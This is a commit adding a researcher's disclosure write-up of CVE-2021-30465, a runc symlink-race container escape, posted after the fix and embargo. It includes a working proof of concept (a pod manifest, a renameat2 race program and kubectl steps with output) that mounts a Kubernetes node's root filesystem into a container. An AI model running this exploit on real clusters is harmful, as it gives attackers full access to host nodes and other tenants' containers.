runc mount destinations can be swapped via symlink-exchange to cause mounts outside the rootfs (CVE-2021-30465)

champtar · champtar · commit a9684660cb57 · 2021-05-30T12:11:04.000-04:00
diff --git a/README.md b/README.md
@@ -7,3 +7,5 @@
 * [Kubernetes MITM using LoadBalancer or ExternalIPs (CVE-2020-8554)](K8S_MITM_LoadBalancer_ExternalIPs/README.md)
 
 * [Metadata service MITM allows root privilege escalation (EKS / GKE)](Metadata_MITM_root_EKS_GKE/README.md)
+
+* [runc mount destinations can be swapped via symlink-exchange to cause mounts outside the rootfs (CVE-2021-30465)](runc-symlink-CVE-2021-30465/README.md)
diff --git a/runc-symlink-CVE-2021-30465/README.md b/runc-symlink-CVE-2021-30465/README.md
@@ -0,0 +1,317 @@
+# runc mount destinations can be swapped via symlink-exchange to cause mounts outside the rootfs (CVE-2021-30465)
+
+It's November 2020 and I'm troubleshooting a container running on K8S that is doing tons of writes to the local disk.
+As those writes are just temporary states, I quickly add an `emptyDir tmpfs` volume at `/var/run`,
+open a ticket so that my devs make it permanent, and call it a day.
+
+Some time later I notice, looking at `mount` output, that this new `tmpfs` is mounted at `/run` instead of `/var/run`,
+which I missed earlier but surprises me a bit. `/var/run` is a symlink to `../run` and
+after a quick test this is actually the normal Linux behavior to have mount follow symlinks,
+so I start wondering how does containerd/runc make sure the mounts are inside the container rootfs.
+
+After following the code responsible for the mounts, I end up reading the comment of [`securejoin.SecureJoinVFS()`](https://github.com/cyphar/filepath-securejoin/blob/40f9fc27fba074f2e2eebb3f74456b4c4939f4da/join.go#L57-L60):
+```
+// Note that the guarantees provided by this function only apply if the path
+// components in the returned string are not modified (in other words are not
+// replaced with symlinks on the filesystem) after this function has returned.
+// Such a symlink race is necessarily out-of-scope of SecureJoin.
+```
+As you read this you know that this race condition exists, the question is how to exploit it to escape to the K8S host.
+
+## POC
+
+When mounting a volume, runc trusts the source, and will let the kernel follow symlinks, but it doesn't trust the target argument and will use 'filepath-securejoin' library to resolve any symlink and ensure the resolved target stays inside the container root.
+As explained in [SecureJoinVFS() documentation](https://github.com/cyphar/filepath-securejoin/blob/40f9fc27fba074f2e2eebb3f74456b4c4939f4da/join.go#L57-L60), using this function is only safe if you know that the checked file is not going to be replaced by a symlink, the problem is that we can replace it by a symlink.
+In K8S there is a trivial way to control the target, create a pod with multiple containers sharing some volumes, one with a correct image, and the other ones with non existing images so they don't start right away.
+
+Let's start with the POC first and the explanations after
+
+1.  Create our attack POD
+
+    ```
+    kubectl create -f - <<EOF
+    apiVersion: v1
+    kind: Pod
+    metadata:
+        name: attack
+    spec:
+        terminationGracePeriodSeconds: 1
+        containers:
+        - name: c1
+        image: ubuntu:latest
+        command: [ "/bin/sleep", "inf" ]
+        env:
+        - name: MY_POD_UID
+            valueFrom:
+            fieldRef:
+                fieldPath: metadata.uid
+        volumeMounts:
+        - name: test1
+            mountPath: /test1
+        - name: test2
+            mountPath: /test2
+    $(for c in {2..20}; do
+    cat <<EOC
+        - name: c$c
+        image: donotexists.com/do/not:exist
+        command: [ "/bin/sleep", "inf" ]
+        volumeMounts:
+        - name: test1
+            mountPath: /test1
+    $(for m in {1..4}; do
+    cat <<EOM
+        - name: test2
+            mountPath: /test1/mnt$m
+    EOM
+    done
+    )
+        - name: test2
+            mountPath: /test1/zzz
+    EOC
+    done
+    )
+        volumes:
+        - name: test1
+        emptyDir:
+            medium: "Memory"
+        - name: test2
+        emptyDir:
+            medium: "Memory"
+    EOF
+    ```
+
+2.  Compile race.c (simple binary running renameat2(dir,symlink,RENAME_EXCHANGE))
+
+    ```
+    cat > race.c <<'EOF'
+    #define _GNU_SOURCE
+    #include <fcntl.h>
+    #include <stdio.h>
+    #include <stdlib.h>
+    #include <sys/types.h>
+    #include <sys/stat.h>
+    #include <unistd.h>
+    #include <sys/syscall.h>
+
+    int main(int argc, char *argv[]) {
+        if (argc != 4) {
+            fprintf(stderr, "Usage: %s name1 name2 linkdest\n", argv[0]);
+            exit(EXIT_FAILURE);
+        }
+        char *name1 = argv[1];
+        char *name2 = argv[2];
+        char *linkdest = argv[3];
+
+        int dirfd = open(".", O_DIRECTORY|O_CLOEXEC);
+        if (dirfd < 0) {
+            perror("Error open CWD");
+            exit(EXIT_FAILURE);
+        }
+
+        if (mkdir(name1, 0755) < 0) {
+            perror("mkdir failed");
+            //do not exit
+        }
+        if (symlink(linkdest, name2) < 0) {
+            perror("symlink failed");
+            //do not exit
+        }
+
+        while (1)
+        {
+            renameat2(dirfd, name1, dirfd, name2, RENAME_EXCHANGE);
+        }
+    }
+    EOF
+
+    gcc race.c -O3 -o race
+    ```
+
+3.  Wait for the container c1 to start, upload the 'race' binary to it, and exec bash
+
+    ```
+    sleep 30 # wait for the first container to start
+    kubectl cp race -c c1 attack:/test1/
+    kubectl exec -ti pod/attack -c c1 -- bash
+    ```
+
+    you now have a shell in container c1
+
+4.  Create the following symlink (explanations later)
+
+    ```
+    ln -s / /test2/test2
+    ```
+
+5.  Launch 'race' multiple times to try to exploit this TOCTOU
+
+    ```
+    cd test1
+    seq 1 4 | xargs -n1 -P4 -I{} ./race mnt{} mnt-tmp{} /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
+    ```
+
+6.  Now that everything is ready, in a second shell, update the images so that the other containers can start
+
+    ```
+    for c in {2..20}; do
+      kubectl set image pod attack c$c=ubuntu:latest
+    done
+    ```
+
+7.  Wait a bit and look at the results
+
+    ```
+    for c in {2..20}; do
+      echo ~~ Container c$c ~~
+      kubectl exec -ti pod/attack -c c$c -- ls /test1/zzz
+    done
+    ```
+    ```
+    ~~ Container c2 ~~
+    test2
+    ~~ Container c3 ~~
+    test2
+    ~~ Container c4 ~~
+    test2
+    ~~ Container c5 ~~
+    bin   dev  home  lib64     mnt  postinst  root  sbin tmp  var
+    boot  etc  lib lost+found  opt  proc    run   sys usr
+    ~~ Container c6 ~~
+    bin   dev  home  lib64     mnt  postinst  root  sbin tmp  var
+    boot  etc  lib lost+found  opt  proc    run   sys usr
+    ~~ Container c7 ~~
+    error: unable to upgrade connection: container not found ("c7")
+    ~~ Container c8 ~~
+    test2
+    ~~ Container c9 ~~
+    bin  boot  dev etc  home  lib lib64  lost+found  mnt opt  postinst  proc  root  run sbin  sys  tmp usr  var
+    ~~ Container c10 ~~
+    test2
+    ~~ Container c11 ~~
+    bin   dev  home  lib64     mnt  postinst  root  sbin tmp  var
+    boot  etc  lib lost+found  opt  proc    run   sys usr
+    ~~ Container c12 ~~
+    test2
+    ~~ Container c13 ~~
+    test2
+    ~~ Container c14 ~~
+    test2
+    ~~ Container c15 ~~
+    bin  boot  dev etc  home  lib lib64  lost+found  mnt opt  postinst  proc  root  run sbin  sys  tmp usr  var
+    ~~ Container c16 ~~
+    error: unable to upgrade connection: container not found ("c16")
+    ~~ Container c17 ~~
+    error: unable to upgrade connection: container not found ("c17")
+    ~~ Container c18 ~~
+    bin  boot  dev etc  home  lib lib64  lost+found  mnt opt  postinst  proc  root  run sbin  sys  tmp usr  var
+    ~~ Container c19 ~~
+    error: unable to upgrade connection: container not found ("c19")
+    ~~ Container c20 ~~
+    test2
+    ```
+
+On my first try running this POC, I had 6 containers where /test1/zzz was / on the node, some failed to start, and the remaining were not affected.
+
+Even without the ability to update images, we could use a fast registry for c1 and a slow registry or big container for c2+, we just need c1 to start 1sec before the others.
+
+Tests were done on the following GKE cluster:
+```
+gcloud beta container --project "delta-array-282919" clusters create "toctou" --zone "us-central1-c" --no-enable-basic-auth --cluster-version "1.18.12-gke.1200" --release-channel "rapid" --machine-type "e2-medium" --image-type "COS_CONTAINERD" --disk-type "pd-standard" --disk-size "100" --metadata disable-legacy-endpoints=true --scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" --num-nodes "3" --enable-stackdriver-kubernetes --enable-ip-alias --network "projects/delta-array-282919/global/networks/default" --subnetwork "projects/delta-array-282919/regions/us-central1/subnetworks/default" --default-max-pods-per-node "110" --no-enable-master-authorized-networks --addons HorizontalPodAutoscaling,HttpLoadBalancing --enable-autoupgrade --enable-autorepair --max-surge-upgrade 1 --max-unavailable-upgrade 0 --enable-shielded-nodes
+```
+
+K8S 1.18.12, containerd 1.4.1, runc 1.0.0-rc10, 2 vCPUs
+
+## Explanations
+
+I haven't dug too deep in the code and relied on strace to understand what was happening, and did the investigation about a month before finally having a working POC, so details are fuzzy, but here is my understanding:
+
+1. K8S prepares all the volumes for the pod in `/var/lib/kubelet/pods/$MY_POD_UID/volumes/VOLUME-TYPE/VOLUME-NAME`
+    (In my POC I'm using the fact that the path is known, but looking at `/proc/self/mountinfo` leaks all you need to find the path)
+
+2. containerd prepares the rootfs at `/run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs`
+
+3. runc calls `unshare(CLONE_NEWNS)` and sets the mount propagation to `MS_SLAVE`, thus preventing the following mount operations to affect other containers or the node directly
+
+4. runc mount bind the K8S volumes
+
+    1. runc call `securejoin.SecureJoin()` to resolve the destination/target
+    
+    2. runc call `mount()`
+
+K8S doesn't give us control over the mount source, but we have full control over the target of the mount,
+so the trick is to mount a directory containing a symlink over K8S volumes path to have the next mount use this new source, and give us access to the node root filesystem.
+
+From the node the filesystem look like this
+```
+/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt1
+/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp1 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
+/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt2 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
+/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp2
+...
+/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2/test2 -> /
+```
+
+Our `race` binary is constantly swapping `mntX` and `mnt-tmpX`, when c2+ start, they do the following mounts
+```
+mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/mntX)
+```
+which is equivalent to
+```
+mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mntX)
+```
+as the volume is bind mounted into the container rootfs
+
+If we are lucky, when we call `SecureJoin()`, `mntX` is a directory, and when we call `mount()` `mntX` is now a symlink, and as `mount()` follow symlinks, this gives us
+```
+mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/)
+```
+
+The filesystem now looks like
+```
+/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2 -> /
+```
+
+When we do the final mount
+```
+mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)
+```
+resolves to
+```
+mount(/, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)
+```
+
+And we now have full access to the whole node root, including /dev, /proc, all the tmpfs and overlay of other containers, everything :)
+
+## Workaround
+
+A possible workaround is to forbid mounting volumes in volumes, but as usual upgrading is recommended.
+
+## Comments
+
+This POC is far from being optimal and, as already stated, being able to update the image is not mandatory.
+
+It took me some tries to have a working POC, at first I was trying to just mount the `tmpfs` volume to impact the host (`/root/.ssh`),
+but this doesn't work as the mounts are happening in a new mount namespace (and with the right mount propagation set), so the mounts are not visible in the host mount namespace.
+I then tried using a golang version for the race binary, 4 containers and 20 volumes, and this was always failing. I then switched to a C version (not sure it makes a difference), 19 containers and 4 mounts and this worked and gave me 6 containers out of 19 with the host mounted. 
+
+Even with newer syscalls like `openat2()` you still need to `mount(/proc/self/fd/X, /proc/self/fd/Y)` to be race free, not sure how useful having a new mount flag to fail when one of the params is a symlink would be, but this is a huge footgun.
+
+This vulnerability exists because having untrusted/restricted container definitions was not part of the initial threat model of Docker/runc and was added later by K8S.
+You can sometimes read that K8S is multi-tenant, but you have to understand it as multiple trusted teams, not as giving API access to strangers.
+
+On February 24th Google introduced GKE Autopilot, fully managed K8S Clusters with an emphasis on security and theoretically no access to the node, so after testing I also reported to them.
+
+## Timeline
+
+* 2020-11-??: Discover `SecureJoinVFS()` comment
+* 2020-12-26: Initial report to security@opencontainers.org (Merry Christmas :) )
+* 2020-12-27: Report acknowledgment
+* 2021-03-06: Report to Google for their new GKE Autopilot
+* 2021-04-07: Got added to discussions around the fix
+* 2021-04-08: Google bounty :) (to be donated to Handicap International)
+* 2021-05-19: End of embargo, advisory published on [GitHub](https://github.com/opencontainers/runc/security/advisories/GHSA-c3xm-pvg7-gh7r) and on [OSS-Security](https://www.openwall.com/lists/oss-security/2021/05/19/2)
+* 2021-05-30: Write-up + POC public
+
+## Acknowledgments
+
+Thanks to Aleksa Sarai (runc maintainer) for his fast responses and all his work, to Noah Meyerhans and Samuel Karp for their help fixing and testing, and to Google for the bounty.